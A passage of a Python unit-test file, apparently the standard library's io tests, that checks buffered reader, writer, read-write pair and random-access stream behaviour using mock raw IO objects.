'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
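# Illustrative sketch (not part of the original test data): with a 4-byte
# buffer over b"AAAAAAAAAA", read(1) pulls up to 4 bytes from the raw
# stream even though only one byte is returned, so a following write(b"B")
# must first seek the raw stream back to offset 1 before the buffered data
# can be flushed at the right place.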
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
